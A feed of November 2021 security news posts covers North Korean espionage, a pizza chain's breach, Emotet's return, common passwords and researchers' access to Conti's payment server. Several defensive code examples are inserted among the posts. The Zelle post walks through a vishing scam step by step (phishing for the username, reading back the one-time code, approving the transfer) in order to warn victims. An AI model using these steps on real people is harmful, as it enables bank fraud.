
North Korea-linked TA406 cyberespionage group activity in 2021

19 November 2021 at 15:14

North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns.

A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (also tracked as Kimsuky, Thallium, Konni, Black Banshee and Velvet Chollima) has intensified its operations in 2021.

The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October 2020, the US-CERT published a report on Kimsuky’s recent activities that provided information on their TTPs and infrastructure.

The APT group mainly targets think tanks and organizations in South Korea; other victims were in the United States, Europe, and Russia.

Since 2018, Proofpoint researchers tracked the activity associated with TA406 as three distinct threat actors, namely TA406, TA408 and TA427.

Since the beginning of 2021, the TA406 group has carried out multiple credential theft campaigns targeting research, education, government, media and other organizations. TA406 doesn’t usually employ malware in its campaigns, however, researchers tracked two campaigns that were attempting to distribute information-stealer malware.

Malware strains associated with the activity of this nation-state actor include KONNI, SANNY, CARROTBAT/CARROTBALL, BabyShark, Amadey and Android Moez.


From January through June 2021, the cyberespionage group mainly targeted foreign policy experts, journalists and nongovernmental organizations (NGOs), focusing on entities involved in activities in line with the interests of Pyongyang. In March, the group orchestrated a malware campaign targeting North American entities.

Another campaign conducted in March 2021 targeted several entities not previously observed as targets for TA406. The targets included some of the highest-ranking elected officials of several different governmental institutions, an employee of a consulting firm, government institutions related to defense, law enforcement, and economy and finance, and generic mailboxes for board and customer relations of a large financial institution.

“Generally, TA406 phishing campaigns focus on individuals in North America, Russia and China, with the actors frequently masquerading as Russian diplomats and academics, representatives of the Ministry of Foreign Affairs of the Russian Federation, human rights officials, or Korean individuals. TA406 has also targeted individuals and organizations related to cryptocurrency for the purpose of financial gain.” reads the report.

The group, like other North Korea-linked APT groups, has also been engaged in financially motivated attacks, including sextortion and attacks against cryptocurrency holders.

“Proofpoint anticipates this threat actor will continue to conduct corporate credential theft operations frequently, targeting entities of interest to the North Korean government,” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

The post North Korea-linked TA406 cyberespionage group activity in 2021 appeared first on Security Affairs.

California Pizza Kitchen discloses a data breach

19 November 2021 at 20:14

American pizza chain California Pizza Kitchen (CPK) suffered a data breach that might have exposed personal information of its employees.

American pizza chain California Pizza Kitchen (CPK) suffered a data breach, the company has already notified employees whose personal information might have been exposed.

According to a data breach notification sent to the impacted employees, the security breach was discovered on September 15. The company immediately launched an investigation into the incident with the support of external experts.

“On or about September 15, 2021, CPK discovered suspicious activity in its computing environment. CPK immediately secured the environment and, with the assistance of third-party computer specialists, launched an investigation to determine the nature and scope of the incident.” reads the data breach notification. “On or about October 4, 2021, the investigation confirmed that certain files on CPK’s systems could have been accessed without authorization. CPK therefore undertook a review of the potentially impacted files to identify the information involved and to whom it related.”

The investigation revealed that the data breach took place on September 15, 2021, and that the total number of current and former CPK employees affected is 103,767.

The company claims to have immediately secured its infrastructure, and it also declared that it has no evidence that the exposed information has been misused.

California Pizza Kitchen also says that it took steps to improve the security of its infrastructure to prevent similar incidents in the future.

The company is offering the impacted employees an Experian identity theft protection service free of charge.

“We are reviewing existing security policies and have implemented additional measures to further protect against similar incidents moving forward. We also reported the incident to law enforcement and will cooperate with any investigation. We are notifying potentially impacted individuals, including you, so that you may take steps to protect your information.” concludes the company.


Pierluigi Paganini

(SecurityAffairs – hacking, data breach)



The ‘Zelle Fraud’ Scam: How it Works, How to Fight Back

19 November 2021 at 21:36

One of the more common ways cybercriminals cash out access to bank accounts involves draining the victim’s funds via Zelle, a “peer-to-peer” (P2P) payment service used by many financial institutions that allows customers to quickly send cash to friends and family. Naturally, a great deal of phishing schemes that precede these bank account takeovers begin with a spoofed text message from the target’s bank warning about a suspicious Zelle transfer. What follows is a deep dive into how this increasingly clever Zelle fraud scam typically works, and what victims can do about it.

Last week’s story warned that scammers are blasting out text messages about suspicious bank transfers as a pretext for immediately calling and scamming anyone who responds via text. Here’s what one of those scam messages looks like:

Anyone who responds “yes,” “no” or at all will very soon after receive a phone call from a scammer pretending to be from the financial institution’s fraud department. The caller’s number will be spoofed so that it appears to be coming from the victim’s bank.

To “verify the identity” of the customer, the fraudster asks for their online banking username, and then tells the customer to read back a passcode sent via text or email. In reality, the fraudster initiates a transaction — such as the “forgot password” feature on the financial institution’s site — which is what generates the authentication passcode delivered to the member.

Ken Otsuka is a senior risk consultant at CUNA Mutual Group, an insurance company that provides financial services to credit unions. Otsuka said a phone fraudster typically will say something like, “Before I get into the details, I need to verify that I’m speaking to the right person. What’s your username?”

“In the background, they’re using the username with the forgot password feature, and that’s going to generate one of these two-factor authentication passcodes,” Otsuka said. “Then the fraudster will say, ‘I’m going to send you the password and you’re going to read it back to me over the phone.'”

The fraudster then uses the code to complete the password reset process, and then changes the victim’s online banking password. The fraudster then uses Zelle to transfer the victim’s funds to others.

An important aspect of this scam is that the fraudsters never even need to know or phish the victim’s password. By sharing their username and reading back the one-time code sent to them via email, the victim is allowing the fraudster to reset their online banking password.

Otsuka said in far too many account takeover cases, the victim has never even heard of Zelle, nor did they realize they could move money that way.

“The thing is, many credit unions offer it by default as part of online banking,” Otsuka said. “Members don’t have to request to use Zelle. It’s just there, and with a lot of members targeted in these scams, although they’d legitimately enrolled in online banking, they’d never used Zelle before.” [Curious if your financial institution uses Zelle? Check out their partner list here].

Otsuka said credit unions offering other peer-to-peer banking products have also been targeted, but that fraudsters prefer to target Zelle due to the speed of the payments.

“The fraud losses can escalate quickly due to the sheer number of members that can be targeted on a single day over the course of consecutive days,” Otsuka said.

To combat this scam Zelle introduced out-of-band authentication with transaction details. This involves sending the member a text containing the details of a Zelle transfer – payee and dollar amount – that is initiated by the member. The member must authorize the transfer by replying to the text.

Unfortunately, Otsuka said, the scammers are defeating this layered security control as well.

“The fraudsters follow the same tactics except they may keep the members on the phone after getting their username and 2-step authentication passcode to login to the accounts,” he said. “The fraudster tells the member they will receive a text containing details of a Zelle transfer and the member must authorize the transaction under the guise that it is for reversing the fraudulent debit card transaction(s).”

In this scenario, the fraudster actually enters a Zelle transfer, which triggers a text to the member that the member is then asked to authorize. For example:

“Send $200 Zelle payment to Boris Badenov? Reply YES to send, NO to cancel. ABC Credit Union . STOP to end all messages.”

“My team has consulted with several credit unions that rolled Zelle out or are planning to introduce Zelle,” Otsuka said. “We found that several credit unions were hit with the scam the same month they rolled it out.”

The upshot of all this is that many financial institutions will claim they’re not required to reimburse the customer for financial losses related to these voice phishing schemes. Bob Sullivan, a veteran journalist who writes about fraud and consumer issues, says in many cases banks are giving customers incorrect and self-serving opinions after the thefts.

“Consumers — many who never ever realized they had a Zelle account – then call their banks, expecting they’ll be covered by credit-card-like protections, only to face disappointment and in some cases, financial ruin,” Sullivan wrote in a recent Substack post. “Consumers who suffer unauthorized transactions are entitled to Regulation E protection, and banks are required to refund the stolen money. This isn’t a controversial opinion, and it was recently affirmed by the CFPB here. If you are reading this story and fighting with your bank, start by providing that link to the financial institution.”

“If a criminal initiates a Zelle transfer — even if the criminal manipulates a victim into sharing login credentials — that fraud is covered by Regulation E, and banks should restore the stolen funds,” Sullivan said. “If a consumer initiates the transfer under false pretenses, the case for redress is more weak.”

Sullivan notes that the Consumer Financial Protection Bureau (CFPB) recently announced it was conducting a probe into companies operating payments systems in the United States, with a special focus on platforms that offer fast, person-to-person payments.

“Consumers expect certain assurances when dealing with companies that move their money,” the CFPB said in its Oct. 21 notice. “They expect to be protected from fraud and payments made in error, for their data and privacy to be protected and not shared without their consent, to have responsive customer service, and to be treated equally under relevant law. The orders seek to understand the robustness with which payment platforms prioritize consumer protection under law.”

Anyone interested in letting the CFPB know about a fraud scam that abused a P2P payment platform like Zelle, Cashapp, or Venmo, for example, should send an email describing the incident to [email protected] Be sure to include Docket No. CFPB-2021-0017 in the subject line of the message.

In the meantime, remember the mantra: Hang up, Look Up, and Call Back. If you receive a call from someone warning about fraud, hang up. If you believe the call might be legitimate, look up the number of the organization supposedly calling you, and call them back.

Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping

19 November 2021 at 22:47

A Canadian teen has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency.

A Canadian teenager has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency from an American individual.

The arrest was announced by the Hamilton Police in Ontario, Canada; it is the result of a joint investigation with the FBI and the United States Secret Service Electronic Crimes Task Force that began in March 2020.

The cryptocurrency was stolen through a SIM swapping attack, which let the attackers intercept the two-factor authentication codes sent to the victim’s phone number and so bypass the 2FA protecting the accounts holding the funds.

“The victim had been targeted by a SIM swap attack, a method of hijacking valuable accounts by manipulating cellular network employees to duplicate phone numbers so threat actors can intercept two-factor authorization requests.” reads the announcement published by the police. “As a result of the SIM swap attack, approximately $46 million CAD worth of cryptocurrency was stolen from the victim. This is currently the biggest cryptocurrency theft reported from one person.”

The police revealed that some of the stolen cryptocurrency was used to purchase an online username that was rare in the gaming community. The analysis of the transaction associated with the purchase allowed the investigators to unmask the account holder of the rare username.

The police arrested the teenager on charges of theft over $5,000 and possession of property or proceeds of property obtained by crime.

Hamilton Police made multiple seizures for a total value of $7 million CAD.


Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency )


Tor Project calls to bring more than 200 obfs4 bridges online by December

20 November 2021 at 00:54

The Tor Project is offering rewards to users who set up a Tor bridge, after observing a significant drop in the number of Tor relays and bridges.

Bridges are unlisted Tor relays that help users circumvent censorship; they are essential in countries that block connections to the public Tor network, such as China, Belarus, Iran, and Kazakhstan.

Unfortunately, the project’s maintainers report that the number of Tor bridges has been decreasing since January, which is why they are urging users to set up new ones.


“We currently have approximately 1,200 bridges, 900 of which support the obfs4 obfuscation protocol. Unfortunately, these numbers have been decreasing since the beginning of this year. It’s not enough to have many bridges: eventually, all of them could find themselves in block lists. We therefore need a constant trickle of new bridges that aren’t blocked anywhere yet. This is where we need your help.” reads the announcement published by the Tor Project.

The Tor Project aims to bring more than 200 new obfs4 bridges online by the end of this year with the help of its users, and is offering exclusive Tor reward kits to bridge operators. For example, users who run 10 obfs4 bridges for one year will receive a Golden Gate bridge kit, including one Tor hoodie, two Tor T-shirts, and a sticker pack.

Below are the kits offered by the Tor Project:

1. Golden Gate bridge (limited to 10 kits)

  • Run 10 obfs4 bridges for 1 year.
  • Reward kit: 1 Tor hoodie + 2 Tor T-shirt + stickers pack.

2. Helix bridge (limited to 20 kits)

  • Run 5 obfs4 bridges for 1 year.
  • Reward kit: 1 Tor T-shirt + stickers pack.

3. University bridge kit (limited to 10 kits)

  • Run 2 obfs4 bridges for 1 year in your university.
  • Reward kit: 1 Tor T-shirt + stickers pack.

4. Rialto bridge (10 new bridge operators selected at random)

  • Run 1 obfs4 bridge for 1 year and you will be part of the ‘reward lottery’.
  • We will randomly select 10 new bridge operators to receive a metallic roots Tor t-shirt as a token of our gratitude for your help defending the open internet.

The offer will be available until January 7, 2022.

The announcement includes instructions to set up a bridge and technical requirements.
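For reference, this is the shape of a torrc for an obfs4 bridge, written here as an added example rather than taken from the Tor Project’s announcement. The nickname, contact address and port numbers are placeholders to replace; the obfs4proxy path is the one the Debian/Ubuntu package installs.

```text
# torrc for a Tor bridge running the obfs4 pluggable transport.
# Placeholder values (Nickname, ContactInfo, ports) are assumptions; replace them.
BridgeRelay 1

# Plain OR port. It must be reachable from the internet, but it is not the
# port censored users connect to.
ORPort 9001

# Pluggable transport: path to obfs4proxy as installed on Debian/Ubuntu.
ServerTransportPlugin obfs4 exec /usr/bin/obfs4proxy

# The port obfs4 clients connect to. It must differ from ORPort and must also be
# reachable from the internet (binding below 1024 needs extra privileges).
ServerTransportListenAddr obfs4 0.0.0.0:443

# Local, auto-assigned port over which tor and obfs4proxy talk to each other.
ExtORPort auto

# So the Tor Project can reach you if the bridge misbehaves.
ContactInfo bridge-operator@example.org
Nickname ExampleObfs4Bridge

# Let BridgeDB hand the bridge out through any distribution channel.
BridgeDistribution any
```

Run `tor --verify-config -f /etc/tor/torrc` before restarting the service. Once the bridge is up, the bridge line to hand to users (address, port, fingerprint and obfs4 certificate) is written to /var/lib/tor/pt_state/obfs4_bridgeline.txt, and the hashed fingerprint in /var/lib/tor/fingerprint lets you look the bridge up on Relay Search without publishing its address.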


Pierluigi Paganini

(SecurityAffairs – hacking, Tor)


The newer cybercrime triad: TrickBot-Emotet-Conti

20 November 2021 at 12:23

Advanced Intelligence researchers argue that the restart of the Emotet botnet was driven by the Conti ransomware gang.

Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird, which disrupted the Emotet botnet. At the time, investigators took control of its infrastructure in a coordinated international action.

This operation was the result of a joint effort between authorities in the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine, with international activity coordinated by Europol and Eurojust.

Law enforcement agencies took over at least 700 servers used as part of the Emotet botnet’s infrastructure. As part of the cleanup operation, the FBI collected millions of email addresses used by the Emotet operators in their malware campaigns.

The Emotet banking trojan has been active since at least 2014; the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as the TrickBot and QBot trojans, or ransomware such as Conti, ProLock, Ryuk, and Egregor.

Last week researchers from multiple cybersecurity firms ([Cryptolaemus], [GData], and [Advanced Intel]) reported that threat actors are using the TrickBot malware to drop an Emotet loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

Researchers from AdvIntel believe that the return will have a significant impact on ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond, for three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demands of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad that results from the first two points.

The Emotet botnet was resurrected by its former operator, who was persuaded to do so by the Conti ransomware gang: the shutdown of the Emotet operation had left the ransomware ecosystem short of high-quality initial access.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including Conti, DoppelPaymer, Egregor, ProLock, Ryuk, and others.

“Most likely because no other groups were able to replicate such capabilities, after leaving cyberspace in January 2021, Emotet left a vacuum that was not filled even with MASSLOADER, also known as Hancitor. Other botnets like QBot attempted to step in but largely failed as a persistent and continuous loader system.” states the report published by AdvIntel. “This created a major interruption within the ransomware supply chains. After the takedown of Emotet, the demand for an efficient source of high-quality access and advanced dissemination was not matched with a proper supply.”

The vacuum left by the Emotet takedown is what made its resurgence valuable to the ransomware ecosystem, and why its return will have a major impact on the threat landscape. The researchers believe that one reason multiple ransomware-as-a-service (RaaS) operations shut down this year (Babuk, DarkSide, BlackMatter, REvil, Avaddon) was that their affiliates relied on low-quality access sellers and brokers (RDP, vulnerable VPNs, poor-quality spam).

With RaaS operations disappearing, traditional groups like Ryuk (Conti), TA505, and EvilCorp regained a pivotal role in the threat landscape, attracting talented malware specialists searching for a stable and ordered operational environment.

In this scenario, the alliance between the Conti group, the TrickBot gang, and Emotet’s operators could boost ransomware operations: Conti is expected to leverage Emotet to deliver its payload to high-value targets.

“Emotet’s return is not coincidental, it is caused by major shifts in the overall cybercrime domain. The growing monopolization of the ransomware world, which is rapidly conquered by only a few highly-organized criminal corporations, leads to better opportunities for criminal ventures like the Emotet botnet developers.” concludes the analysis. “Larger organized crime groups have higher profits working together in a liaison. This has been proven by the alliance of TrickBot, Emotet, and Ryuk: the three major players of the pre-2019 cybercrime hierarchy. In late 2021, as the smaller actors are losing their impact and power, while larger ones are becoming even bigger, the new criminal alliance between TrickBot, Emotet, and Conti, is a logical avenue for criminals.”


Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)


Study reveals top 200 most common passwords

20 November 2021 at 15:07

The annual study on top-used passwords published by Nordpass revealed that we are still using weak credentials that expose us to serious risks.

Nordpass has published its annual report, titled “Top 200 most common passwords,” on the use of passwords. The report shows that we are still using weak passwords.

The list of passwords was compiled with the support of independent researchers specializing in data breach analysis; the study is based on the analysis of a 4 TB database containing passwords from 50 countries.

The most used passwords are still 123456, 123456789, 12345, qwerty, and “password”. Businesses fail to enforce strong passwords and rarely require employees to enable multi-factor authentication (MFA).

The report revealed that the most common passwords in 2021 were:

  1. 123456 (103,170,552 hits)
  2. 123456789 (46,027,530 hits)
  3. 12345 (32,955,431 hits)
  4. qwerty (22,317,280 hits)
  5. password (20,958,297 hits)
  6. 12345678 (14,745,771 hits)
  7. 111111 (13,354,149 hits)
  8. 123123 (10,244,398 hits)
  9. 1234567890 (9,646,621 hits)
  10. 1234567 (9,396,813 hits)

Below is the map showing password leaks per capita:


According to the report, a stunning number of people have the bad habit of using their own name as a password. Sports teams and car brands are also popular choices: “Liverpool” is the most used team name worldwide, while “Ferrari” and “Porsche” are the most used car brands.

The password “iloveyou” is used more by women: in the US, 222,287 women use it, compared with 96,785 men.

Below are the password hygiene basics provided by the experts:

  • Use complex passwords containing at least 12 characters and a varied combination of upper and lowercase letters, numbers, and symbols. A password generator can produce them easily.
  • Never reuse passwords across multiple accounts.
  • Regularly update passwords; the report recommends changing passwords every 90 days.
  • Check password strength: regularly assess your password health, identify weak, reused, or old passwords, and replace them with new, complex ones.
  • Use a password manager.
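The block below is an added example, not part of the NordPass report or of the article: a Python policy check that enforces the 12-character minimum and rejects not only exact matches against a common-password list but also the mangled variants (Password2021!, P@ssw0rd, ILoveYou2021!!) that an attacker’s wordlist rules generate and that a naive exact-match check lets through. The blocklist is a constructed excerpt of the report’s entries; a real deployment would load the full list or a breach corpus such as Pwned Passwords. One caveat on the hygiene list above: NIST SP 800-63B advises against forced periodic rotation and recommends changing a password only on evidence of compromise, so the 90-day item reflects the report’s advice rather than current guidance.

```python
import re

# Constructed blocklist: the report's top ten plus the name-, team- and brand-style
# entries the article mentions. Load the full top-200 list or a breach corpus in practice.
COMMON_PASSWORDS = {
    "123456", "123456789", "12345", "qwerty", "password", "12345678",
    "111111", "123123", "1234567890", "1234567",
    "iloveyou", "liverpool", "ferrari", "porsche",
}

MIN_LENGTH = 12

# Substitutions users make to sneak a blocklisted word past an exact-match check.
LEET_TABLE = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                            "0": "o", "$": "s", "5": "s", "7": "t"})


def normalize(password: str) -> str:
    """Reduce a password to the base word an attacker's mangling rules would start from.

    Lowercase, strip leading and trailing digits/punctuation (Password2021!, !!qwerty),
    then undo common leetspeak (P@ssw0rd -> password). Returns "" for all-digit input.
    """
    base = password.lower()
    base = re.sub(r"^[^a-z]+", "", base)
    base = re.sub(r"[^a-z]+$", "", base)
    return base.translate(LEET_TABLE)


def check_password(password: str, blocklist=COMMON_PASSWORDS) -> list:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() in blocklist:
        problems.append("exact match in common-password list")
    else:
        base = normalize(password)
        if base and base in blocklist:
            problems.append(f"variant of common password '{base}'")
    return problems


if __name__ == "__main__":
    for candidate in ("123456", "ILoveYou2021!!", "P@ssw0rd", "Liverpool1892",
                      "Tr0ub4dor&3", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate) or 'ok'}")
```

The normalization is deliberately lossy in one direction only: it can map an acceptable password onto a blocklisted base word (a false reject the user can work around), but never the reverse, so the check stays conservative.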


Pierluigi Paganini

(SecurityAffairs – hacking, top-used passwords)


North Korean Hackers Found Behind a Range of Credential Theft Campaigns

20 November 2021 at 15:26
A threat actor with ties to North Korea has been linked to a prolific wave of credential theft campaigns targeting research, education, government, media and other organizations, with two of the attacks also attempting to distribute malware that could be used for intelligence gathering. Enterprise security firm Proofpoint attributed the infiltrations to a group it tracks as TA406, and by the

RedCurl Corporate Espionage Hackers Return With Updated Hacking Tools

20 November 2021 at 15:54
A corporate cyber-espionage hacker group has resurfaced after a seven-month hiatus with new intrusions targeting four companies this year, including one of the largest wholesale stores in Russia, while simultaneously making tactical improvements to its toolset in an attempt to thwart analysis. "In every attack, the threat actor demonstrates extensive red teaming skills and the ability to bypass

U.S. banking regulators order banks to notify cybersecurity incidents in 36 hours

20 November 2021 at 22:43

U.S. banking regulators have approved a new rule that orders banks to notify federal regulators of significant cybersecurity incidents within 36 hours.

U.S. banking regulators this week approved a rule that obliges banks to report any major cybersecurity incidents to the government within 36 hours of discovery. Major cybersecurity incidents are attacks that impact operations of the victims or the stability of the US financial sector.

The rule was approved by the Federal Reserve, Federal Deposit Insurance Corporation and Office of the Comptroller of the Currency. The rule aims at forcing banks to quickly respond to cybersecurity incidents.

The rule also requires financial institutions to notify customers “as soon as possible” if an attack has caused problems lasting four or more hours.

According to Reuters, the banking industry recently completed a large cross-industry cybersecurity drill to test the response to a ransomware attack that threatens to disrupt a range of financial services.


Pierluigi Paganini

(SecurityAffairs – hacking, U.S. banking)


Security Affairs newsletter Round 341

20 November 2021 at 23:41

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

U.S. banking regulators order banks to notify cybersecurity incidents in 36 hours
Study reveals top 200 most common passwords
The newer cybercrime triad: TrickBot-Emotet-Conti
Tor Project calls to bring more than 200 obfs4 bridges online by December
Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping
California Pizza Kitchen discloses a data breach
North Korea-linked TA406 cyberespionage group activity in 2021
Conti ransomware operations made at least $25.5 million since July 2021
Android banking Trojan BrazKing is back with significant evasion improvements
Microsoft addresses a high-severity vulnerability in Azure AD
Attackers deploy Linux backdoor on e-stores compromised with software skimmer
Zero-Day flaw in FatPipe products actively exploited, FBI warns
Phishing campaign targets Tiktok influencer accounts
US, UK and Australia warn of Iran-linked APTs exploiting Fortinet, Microsoft Exchange flaws
Netgear fixes code execution flaw in many SOHO devices
CISA releases incident response plans for federal agencies
The rise of millionaire zero-day exploit markets
Iran-linked APT groups continue to evolve
Mandiant links Ghostwriter operations to Belarus
GitHub addressed two major vulnerabilities in the NPM package manager
Adult cam site StripChat exposes the data of millions of users and cam models
Intel addresses 2 high-severity issues in BIOS firmware of several processors
SharkBot, a new Android Trojan targets banks in Europe
Operation Reacharound – Emotet malware is back
Cloudflare mitigated 2 Tbps DDoS attack, the largest attack it has seen to date
North Korea-linked Lazarus group targets cybersecurity experts with Trojanized IDA Pro
Microsoft rolled out emergency updates to fix Windows Server auth failures
Happy 10th Birthday, Security Affairs
QAKBOT Trojan returns using Squirrelwaffle as a dropper
Two Sony PS5 exploits disclosed the same day
ENISA – The need for Incident Response Capabilities in the health sector
Updated: Hundreds of thousands of fake warnings of cyberattacks sent from a hacked FBI email server
FTC shares guidance for small businesses to prevent ransomware attacks
Threat Report Portugal: Q3 2021


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)


Attackers compromise Microsoft Exchange servers to hijack internal email chains

21 November 2021 at 11:12

A malware campaign aimed at Microsoft Exchange servers exploits ProxyShell and ProxyLogon issues and uses stolen internal reply-chain emails.

A malware campaign aimed at Microsoft Exchange servers exploits ProxyShell and ProxyLogon issues and uses stolen internal reply-chain emails to avoid detection.

The campaign was uncovered by Trend Micro researchers, who detailed the technique used to trick victims into opening the malicious emails used as the attack vector.

The attacks are part of Squirrelwaffle campaigns; the operators of this loader are known for sending malicious spam as replies to existing email chains.

The investigation into three incidents revealed that attackers used exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell).

Once they have compromised the Exchange servers, the attackers use the access to reply to the company’s internal email threads with messages carrying links to weaponized documents. Because the messages are sent from the organization’s own mailboxes, they bypass detection at the mail gateway.

“In the same intrusion, we analyzed the email headers for the received malicious emails, the mail path was internal (between the three internal exchange servers’ mailboxes), indicating that the emails did not originate from an external sender, open mail relay, or any message transfer agent (MTA).” reads the analysis published by Trend Micro. “Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail gateways will not be able to filter or quarantine any of these internal emails.”

The emails originate from the same internal network and appear to be a continuation of a previous discussion between two employees.

To avoid detection, the attackers did not use lateral movement tools or execute malware on the Exchange servers themselves.

The emails carry weaponized Office documents or include a link to them. Once the recipient enables content, malicious macros execute to download and install malware such as Qbot, Cobalt Strike, and SquirrelWaffle.

The Excel sheets used in this campaign contain malicious Excel 4.0 macros that download and execute the malicious DLL.
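The point of the Trend Micro finding is that a message which never leaves the Exchange organization is never seen by the mail gateway, so the inspection has to happen on mail pulled from the mailboxes or the journal instead. The following script is an added example (not code from Trend Micro or from this post) of that triage step: it reads a raw RFC 822 message, reconstructs the hop path from the Received headers, and singles out internal-only mail that carries macro-capable Office attachments or links to hosts outside the organization for further inspection. The Exchange host names, the internal domain and the sample message are all constructed.

```python
"""Triage of mail that never crossed the gateway.

Added example; not code from Trend Micro or Security Affairs. Assumes messages
are exported as raw RFC 822 text (e.g. from Exchange journaling). The internal
host list, the internal domain and the sample message are all constructed.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed inventory of the organisation's own Exchange servers and domain.
INTERNAL_HOSTS = {"exch01.corp.example", "exch02.corp.example", "exch03.corp.example"}
INTERNAL_DOMAIN = "corp.example"
# Office formats that can carry VBA or Excel 4.0 (XLM) macros.
MACRO_CAPABLE = (".xls", ".xlsm", ".xlsb", ".xlam", ".doc", ".docm", ".dotm")

HOP_RE = re.compile(r"from\s+([\w.-]+).*?\bby\s+([\w.-]+)", re.S)
URL_RE = re.compile(r"https?://([\w.-]+)[^\s\"'<>]*")

# Constructed sample: a reply in an internal thread whose only hops are the
# three internal Exchange servers, carrying an .xls attachment and a link.
SAMPLE_MAIL = """\
Received: from exch02.corp.example (10.0.0.12) by exch01.corp.example (10.0.0.11) with Microsoft SMTP Server; Mon, 15 Nov 2021 09:12:44 +0000
Received: from exch03.corp.example (10.0.0.13) by exch02.corp.example (10.0.0.12) with Microsoft SMTP Server; Mon, 15 Nov 2021 09:12:43 +0000
From: alice@corp.example
To: bob@corp.example
Subject: RE: Q4 budget figures
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Hi Bob, the updated sheet is attached and also here: https://files.example.net/report.xls
--b1
Content-Type: application/vnd.ms-excel; name="budget.xls"
Content-Disposition: attachment; filename="budget.xls"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""


def parse(raw: str) -> EmailMessage:
    return email.message_from_string(raw, policy=policy.default)


def received_hops(msg):
    """Return (from_host, by_host) pairs, newest hop first, from the Received headers."""
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(str(value))
        if m:
            hops.append((m.group(1).lower(), m.group(2).lower()))
    return hops


def is_internal_only(msg, internal_hosts=INTERNAL_HOSTS):
    """True when every hop is between hosts in our own inventory (the gateway never saw it)."""
    hops = received_hops(msg)
    return bool(hops) and all(src in internal_hosts and dst in internal_hosts for src, dst in hops)


def macro_capable_attachments(msg):
    return [part.get_filename() for part in msg.walk()
            if part.get_filename() and part.get_filename().lower().endswith(MACRO_CAPABLE)]


def external_links(msg, internal_domain=INTERNAL_DOMAIN):
    """URLs in text parts whose host is outside the internal domain."""
    links = []
    for part in msg.walk():
        if part.get_content_type() != "text/plain":
            continue
        for m in URL_RE.finditer(part.get_content()):
            host = m.group(1).lower()
            if host != internal_domain and not host.endswith("." + internal_domain):
                links.append(m.group(0))
    return links


def triage(raw: str) -> dict:
    msg = parse(raw)
    internal = is_internal_only(msg)
    attachments = macro_capable_attachments(msg)
    links = external_links(msg)
    return {
        "subject": msg["Subject"],
        "internal_only": internal,
        "macro_capable_attachments": attachments,
        "external_links": links,
        # Internal-only mail with macro-capable content bypassed the gateway entirely,
        # so it is the population to route to sandboxing or a mailbox-side scanner.
        "needs_inspection": internal and bool(attachments or links),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MAIL))
```

The script is a selection filter, not a verdict: an internal thread with a spreadsheet attached is normal, which is exactly why such mail is usually left unscanned; the filter simply ensures that the part of the mail flow the gateway cannot see still gets looked at.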


Experts recommend that organizations secure their Microsoft Exchange servers by installing the security updates published by Microsoft.

“As mentioned earlier, by exploiting ProxyLogon and ProxyShell attackers were able to bypass the usual checks that would have stopped the spread of malicious email.” concludes the analysis. “It is important to ensure that patches for Microsoft Exchange Server vulnerabilities, specifically ProxyShell and ProxyLogon (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) have already been applied.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ProxyLogon)

The post Attackers compromise Microsoft Exchange servers to hijack internal email chains appeared first on Security Affairs.

Researchers were able to access the payment portal of the Conti gang

21 November 2021 at 15:01

The Conti ransomware group has suffered a data breach that exposed its attack infrastructure and allowed researchers to access it.

Researchers at security firm Prodaft were able to identify the real IP address of one of the servers used by the Conti ransomware group and access its console for more than a month. The exposed server was hosting the payment portal used by the gang for ransom negotiations with the victims.

“The PTI team accessed Conti’s infrastructure and identified the real IP addresses of the servers in question.” reads the report published by the experts. “Our team detected a vulnerability in the recovery servers that Conti uses, and leveraged that vulnerability to discover the real IP addresses of the hidden service hosting the group’s recovery website.”

The experts launched an investigation into the activity of the group with the intent of unmasking the Conti affiliates, retailers, developers and servers.

The researchers were able to unmask the real IP address of Conti’s Tor hidden service and of contirecovery.ws; the latter is hosted on an IP address owned by the Ukrainian web hosting company ITL LLC.

Prodaft researchers were able to compromise the server and monitor network traffic for incoming connections, including SSH connections used by Conti members to access the server.

However, the IP addresses associated with SSH connections belonged to Tor exit nodes used by Conti operators to hide their identity.

The experts were also able to determine the OS of the server behind the hidden service, a Debian distro with hostname “dedic-cuprum-617836”. Experts speculate the numeric value in the hostname is an invoice number for the server, assigned by the hosting company ITLDC.

Linux version 4.9.0-16-amd64 (Debian 6.3.0-18deb9u1) #1 SMP Debian 4.9.272-2
